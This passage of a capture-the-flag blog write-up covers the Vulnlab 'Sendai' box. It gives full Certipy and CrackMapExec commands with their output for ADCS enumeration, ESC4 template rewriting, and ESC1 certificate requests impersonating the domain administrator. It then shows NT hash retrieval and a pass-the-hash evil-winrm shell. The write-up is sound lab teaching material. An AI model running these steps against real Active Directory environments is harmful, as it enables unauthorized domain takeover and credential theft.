<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">Name        : Support</span><br><span class="line">DisplayName :</span><br><span class="line">ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p &lt;REDACTED&gt; -k netsvcs</span><br><span class="line">User        : LocalSystem</span><br><span class="line">StartMode   : Automatic</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<h2 id="ADCS"><a href="#ADCS" class="headerlink" title="ADCS"></a>ADCS</h2><p>Next, let’s do some ADCS enumeration using the <code>ADCS</code> module from CrackMapExec</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  cme ldap sendai.vl -u Elliot.Yates -p &#x27;Passw0rd@&#x27; -M ADCS</span><br><span class="line">SMB         10.10.79.192    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)</span><br><span class="line">LDAP        10.10.79.192    389    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@</span><br><span class="line">ADCS        10.10.79.192    389    DC               [*] Starting LDAP search with search filter &#x27;(objectClass=pKIEnrollmentService)&#x27;</span><br><span class="line">ADCS                                                Found PKI Enrollment Server: dc.sendai.vl</span><br><span class="line">ADCS                                                Found CN: sendai-DC-CA</span><br><span class="line">ADCS                                                Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES</span><br></pre></td></tr></table></figure>
<p>As observed, ADCS is being utilized on the machine. We can then use <code>Certipy</code> with the <code>find</code> command to identify templates</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">➜  certipy find -u &#x27;clifford.davey&#x27; -p &#x27;&lt;REDACTED&gt;&#x27; -dc-ip 10.10.79.192 -dns-tcp -ns 10.10.79.192 -debug</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[+] Authenticating to LDAP server</span><br><span class="line">[+] Bound to ldaps://10.10.79.192:636 - ssl</span><br><span class="line">[+] Default path: DC=sendai,DC=vl</span><br><span class="line">[+] Configuration path: CN=Configuration,DC=sendai,DC=vl</span><br><span class="line">[*] Finding certificate templates</span><br><span class="line">[*] Found 34 certificate templates</span><br><span class="line">[*] Finding certificate authorities</span><br><span class="line">[*] Found 1 certificate authority</span><br><span class="line">[*] Found 12 enabled certificate templates</span><br><span class="line">[+] Trying to resolve &#x27;dc.sendai.vl&#x27; at &#x27;10.10.79.192&#x27;</span><br><span class="line">[*] Trying to get CA configuration for &#x27;sendai-DC-CA&#x27; via CSRA</span><br><span class="line">[+] Trying to get DCOM connection for: 10.10.79.192</span><br><span class="line">[!] Got error while trying to get CA configuration for &#x27;sendai-DC-CA&#x27; via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.</span><br><span class="line">[*] Trying to get CA configuration for &#x27;sendai-DC-CA&#x27; via RRP</span><br><span class="line">[!] Failed to connect to remote registry. Service should be starting now. Trying again...</span><br><span class="line">[+] Connected to remote registry at &#x27;dc.sendai.vl&#x27; (10.10.79.192)</span><br><span class="line">[*] Got CA configuration for &#x27;sendai-DC-CA&#x27;</span><br><span class="line">[+] Resolved &#x27;dc.sendai.vl&#x27; from cache: 10.10.79.192</span><br><span class="line">[+] Connecting to 10.10.79.192:80</span><br><span class="line">[*] Saved BloodHound data to &#x27;20240317113517_Certipy.zip&#x27;. Drag and drop the file into the BloodHound GUI from @ly4k</span><br><span class="line">[+] Adding Domain Computers to list of current user&#x27;s SIDs</span><br><span class="line">[*] Saved text output to &#x27;20240317113517_Certipy.txt&#x27;</span><br><span class="line">[*] Saved JSON output to &#x27;20240317113517_Certipy.json&#x27;</span><br></pre></td></tr></table></figure>
<h1 id="ESC4"><a href="#ESC4" class="headerlink" title="ESC4"></a>ESC4</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">                                        SENDAI.VL\Enterprise Admins</span><br><span class="line">                                        SENDAI.VL\Administrator</span><br><span class="line">                                        SENDAI.VL\ca-operators</span><br><span class="line">      Write Property Principals       : SENDAI.VL\Domain Admins</span><br><span class="line">                                        SENDAI.VL\Enterprise Admins</span><br><span class="line">                                        SENDAI.VL\Administrator</span><br><span class="line">                                        SENDAI.VL\ca-operators</span><br><span class="line">  [!] Vulnerabilities</span><br><span class="line">    ESC4                              : &#x27;SENDAI.VL\\ca-operators&#x27; has dangerous permissions</span><br><span class="line">1</span><br><span class="line">  Template Name                       : KerberosAuthentication</span><br><span class="line">  Display Name                        : Kerberos Authentication</span><br><span class="line">  Certificate Authorities             : sendai-DC-CA</span><br><span class="line">  Enabled                             : True</span><br><span class="line">  Client Authentication               : True</span><br><span class="line">  Enrollment Agent                    : False</span><br><span class="line">  Any Purpose                         : False</span><br></pre></td></tr></table></figure>
<p>From the Certipy output, we can see that the <code>SendaiComputer</code> template is vulnerable to ESC4. We can refer to this HackTricks article <a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#vulnerable-certificate-template-access-control-esc4">Vulnerable Certificate Template Access Control - ESC4</a> or this YouTube video <a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=EuQ6jiKK7q0">AD CS ESC4 Privilege Escalation Tutorial</a> which explains how to abuse ESC4.</p>
<h2 id="Abuse"><a href="#Abuse" class="headerlink" title="Abuse"></a>Abuse</h2><p>The first step is to make the certificate vulnerable to ESC1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  certipy template -username clifford.davey@sendai.vl -password &lt;REDACTED&gt; -template SendaiComputer -save-old -dc-ip 10.10.79.192</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Saved old configuration for &#x27;SendaiComputer&#x27; to &#x27;SendaiComputer.json&#x27;</span><br><span class="line">[*] Updating certificate template &#x27;SendaiComputer&#x27;</span><br><span class="line">[*] Successfully updated &#x27;SendaiComputer&#x27;</span><br></pre></td></tr></table></figure>
<p>Now, if we run the Certipy find command again, it will indicate that the template is vulnerable to ESC1. ESC2, ESC3 and ESC4</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">        Owner                           : SENDAI.VL\Administrator</span><br><span class="line">        Full Control Principals         : SENDAI.VL\Authenticated Users</span><br><span class="line">        Write Owner Principals          : SENDAI.VL\Authenticated Users</span><br><span class="line">        Write Dacl Principals           : SENDAI.VL\Authenticated Users</span><br><span class="line">        Write Property Principals       : SENDAI.VL\Authenticated Users</span><br><span class="line">    [!] Vulnerabilities</span><br><span class="line">      ESC1                              : &#x27;SENDAI.VL\\Authenticated Users&#x27; can enroll, enrollee supplies subject and template allows client authentication</span><br><span class="line">      ESC2                              : &#x27;SENDAI.VL\\Authenticated Users&#x27; can enroll and template can be used for any purpose</span><br><span class="line">      ESC3                              : &#x27;SENDAI.VL\\Authenticated Users&#x27; can enroll and template has Certificate Request Agent EKU set</span><br><span class="line">      ESC4                              : &#x27;SENDAI.VL\\Authenticated Users&#x27; has dangerous permissions</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<h1 id="ESC1"><a href="#ESC1" class="headerlink" title="ESC1"></a>ESC1</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  certipy req -username clifford.davey@sendai.vl -password &lt;REDACTED&gt; -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Requesting certificate via RPC</span><br><span class="line">[*] Successfully requested certificate</span><br><span class="line">[*] Request ID is 4</span><br><span class="line">[*] Got certificate with UPN &#x27;administrator@sendai.vl&#x27;</span><br><span class="line">[*] Certificate has no object SID</span><br><span class="line">[*] Saved certificate and private key to &#x27;administrator.pfx&#x27;</span><br></pre></td></tr></table></figure>
<p>That was successful, we got the <code>administrator.pfx</code> file, which we can use to obtain a TGT and the NTLM hash for the administrator user</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  certipy auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.79.192</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Using principal: administrator@sendai.vl</span><br><span class="line">[*] Trying to get TGT...</span><br><span class="line">[*] Got TGT</span><br><span class="line">[*] Saved credential cache to &#x27;administrator.ccache&#x27;</span><br><span class="line">[*] Trying to retrieve NT hash for &#x27;administrator&#x27;</span><br><span class="line">[*] Got hash for &#x27;administrator@sendai.vl&#x27;: &lt;REDACTED&gt;:&lt;REDACTED&gt;</span><br></pre></td></tr></table></figure>
<p>With the NTLM hash for the administrator, we will connect over winrm and grab the root flag 🚩🐈</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  evil-winrm -i sendai.vl -u administrator -H &lt;REDACTED&gt;</span><br><span class="line"></span><br><span class="line">Evil-WinRM shell v3.5</span><br><span class="line"></span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine</span><br><span class="line"></span><br><span class="line">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span><br><span class="line"></span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; cat ..\desktop\root.txt</span><br><span class="line">VL&#123;REDACTED&#125;</span><br></pre></td></tr></table></figure>
<p>That concludes this box. I hope you learned something new! 🐱</p>
</article><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/vulnlab/">vulnlab</a></div><div class="post_share"></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2024/05/28/Escape-Vulnlab/" title="Escape - Vulnlab"><img class="cover" src="https://wiki.vulnlab.com/~gitbook/image?url=https%3A%2F%2F3528174365-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FI3I73FFqB6GvT8N5Mt1N%252Fuploads%252Ft12lXmil2VV0iVqncZnv%252Fescape_slide.png%3Falt%3Dmedia%26token%3Dce1f8941-c579-4d9a-bb57-ea6de1e5252b&amp;width=768&amp;dpr=1&amp;quality=100&amp;sign=642a654e4f3d5c89f5bd79724228f6521b285446f0055d8b5050aced207fd1f8" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">Escape - Vulnlab</div></div></a></div><div class="next-post pull-right"><a href="/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/" title="NetExec Cheatsheet"><img class="cover" src="https://repository-images.githubusercontent.com/689013903/3d0fa9de-9232-4caa-9a01-a80ebca9dc9c" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">NetExec Cheatsheet</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>Related Articles</span></div><div class="relatedPosts-list"><div><a href="/2023/12/14/Bamboo-Vulnlab/" title="Bamboo - Vulnlab"><img class="cover" src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2F32f31a6a-94e8-4f0c-a634-b4d25ddb3468%2Fbamboo_slide.webp?table=block&id=4a0a5659-6394-4650-b233-d1910b3f33f8&spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&width=1030&userId=&cache=v2" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-12-14</div><div class="title">Bamboo - Vulnlab</div></div></a></div><div><a href="/2024/05/28/Escape-Vulnlab/" title="Escape - Vulnlab"><img class="cover" src="https://wiki.vulnlab.com/~gitbook/image?url=https%3A%2F%2F3528174365-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FI3I73FFqB6GvT8N5Mt1N%252Fuploads%252Ft12lXmil2VV0iVqncZnv%252Fescape_slide.png%3Falt%3Dmedia%26token%3Dce1f8941-c579-4d9a-bb57-ea6de1e5252b&width=768&dpr=1&quality=100&sign=642a654e4f3d5c89f5bd79724228f6521b285446f0055d8b5050aced207fd1f8" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-05-28</div><div class="title">Escape - Vulnlab</div></div></a></div><div><a href="/2023/10/25/Job-Vulnlab/" title="Job - Vulnlab"><img class="cover" src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2Fdf7a8010-c06f-4ab7-b4ca-840c76b90893%2FUntitled.png?table=block&id=4eee05c7-64ed-409d-9fab-63f5a6e430ba&spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&width=1020&userId=&cache=v2" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-10-25</div><div class="title">Job - Vulnlab</div></div></a></div><div><a href="/2024/01/20/Lock-Vulnlab/" title="Lock - Vulnlab"><img class="cover" src="https://1897091482-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FI3I73FFqB6GvT8N5Mt1N%2Fuploads%2FqlrTgqfYZ2LxYiFsS7F0%2Flock_slide.png?alt=media&token=4a34abe6-3e20-4725-9334-bd39e2db903a" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-01-20</div><div class="title">Lock - Vulnlab</div></div></a></div><div><a href="/2023/10/19/Media-Vulnlab/" title="Media - Vulnlab"><img class="cover" src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2F723ecb50-3ce1-43a7-8202-b53f76aa2ccf%2Fmedia.png?table=block&id=965e07b3-adbf-4f84-b843-97ecaafe658a&spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&width=1020&userId=&cache=v2" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-10-19</div><div class="title">Media - Vulnlab</div></div></a></div><div><a href="/2024/11/24/Redelegate-Vulnlab/" title="Redelegate - Vulnlab"><img class="cover" src="https://assets.vulnlab.com/redelegate_slide.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-24</div><div class="title">Redelegate - Vulnlab</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/cat.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">serioton</div><div class="author-info__description">cat</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">33</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">10</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">3</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://twitter.com/seriotonctf"><i class="fab fa-twitter"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/seriotonctf" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="https://twitter.com/seriotonctf" target="_blank" title="Twitter"><i class="fab fa-twitter"></i></a></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Contents</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#NMAP"><span class="toc-text">NMAP</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SMB"><span class="toc-text">SMB</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Password-Change"><span class="toc-text">Password Change</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GenericALL"><span class="toc-text">GenericALL</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#gMSA-Password"><span class="toc-text">gMSA Password</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#PrivEsc"><span class="toc-text">PrivEsc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ADCS"><span class="toc-text">ADCS</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ESC4"><span class="toc-text">ESC4</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Abuse"><span class="toc-text">Abuse</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ESC1"><span class="toc-text">ESC1</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Post</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2025/04/07/Shibuya-Vulnlab/" title="Shibuya - Vulnlab"><img src="https://assets.vulnlab.com/shibuya_slide.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Shibuya - Vulnlab"/></a><div class="content"><a class="title" href="/2025/04/07/Shibuya-Vulnlab/" title="Shibuya - Vulnlab">Shibuya - Vulnlab</a><time datetime="2025-04-07T22:25:48.000Z" title="Created 2025-04-07 22:25:48">2025-04-07</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2025/02/15/HTB-Solving-Cicada-Using-Only-NetExec/" title="HTB: Solving Cicada Using Only NetExec"><img src="https://serioton.notion.site/image/attachment%3A4ca01f6b-9b7d-4591-bbdf-0bf2c18f6653%3Acicada.jpg?table=block&amp;id=19bd3b99-8509-8026-a179-e0118017a611&amp;spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&amp;width=1420&amp;userId=&amp;cache=v2" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HTB: Solving Cicada Using Only NetExec"/></a><div class="content"><a class="title" href="/2025/02/15/HTB-Solving-Cicada-Using-Only-NetExec/" title="HTB: Solving Cicada Using Only NetExec">HTB: Solving Cicada Using Only NetExec</a><time datetime="2025-02-15T13:54:52.000Z" title="Created 2025-02-15 13:54:52">2025-02-15</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2025/01/31/Abusing-Unconstrained-Delegation/" title="Abusing Unconstrained Delegation"><img src="https://serioton.notion.site/image/attachment%3A0bf0667e-6ae0-45c4-8872-2e681305a82c%3Acat.png?table=block&amp;id=18cd3b99-8509-805b-8ac7-f5241d4b2083&amp;spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&amp;width=1420&amp;userId=&amp;cache=v2" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Abusing Unconstrained Delegation"/></a><div class="content"><a class="title" href="/2025/01/31/Abusing-Unconstrained-Delegation/" title="Abusing Unconstrained Delegation">Abusing Unconstrained Delegation</a><time datetime="2025-01-31T17:58:46.000Z" title="Created 2025-01-31 17:58:46">2025-01-31</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/12/01/BloodyAD-Cheatsheet/" title="BloodyAD Cheatsheet"><img src="https://serioton.notion.site/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F9163bddd-7f46-4e82-a292-895fe15866d3%2Febc8dc6e-40a9-492f-839f-b175138faa93%2Fcat.png?table=block&amp;id=14fd3b99-8509-80fd-bbe8-daf204d95fcc&amp;spaceId=9163bddd-7f46-4e82-a292-895fe15866d3&amp;width=2000&amp;userId=&amp;cache=v2" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="BloodyAD Cheatsheet"/></a><div class="content"><a class="title" href="/2024/12/01/BloodyAD-Cheatsheet/" title="BloodyAD Cheatsheet">BloodyAD Cheatsheet</a><time datetime="2024-12-01T20:16:14.000Z" title="Created 2024-12-01 20:16:14">2024-12-01</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/11/24/Redelegate-Vulnlab/" title="Redelegate - Vulnlab"><img src="https://assets.vulnlab.com/redelegate_slide.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Redelegate - Vulnlab"/></a><div class="content"><a class="title" href="/2024/11/24/Redelegate-Vulnlab/" title="Redelegate - Vulnlab">Redelegate - Vulnlab</a><time datetime="2024-11-24T16:47:11.000Z" title="Created 2024-11-24 16:47:11">2024-11-24</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/camille-sule-bg-loulou-frames-00.jpg')"><div id="footer-wrap"><div class="copyright">&copy;2023 - 2025 By serioton</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">ฅ^•ﻌ•^ฅ</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle between single-column and double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">Search</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  Loading the Database</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts" type="text"/></div></div><hr/><div id="local-search-results"></div></div></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module"></script><script src="/js/search/local-search.js"></script><div class="js-pjax"></div></div></body></html>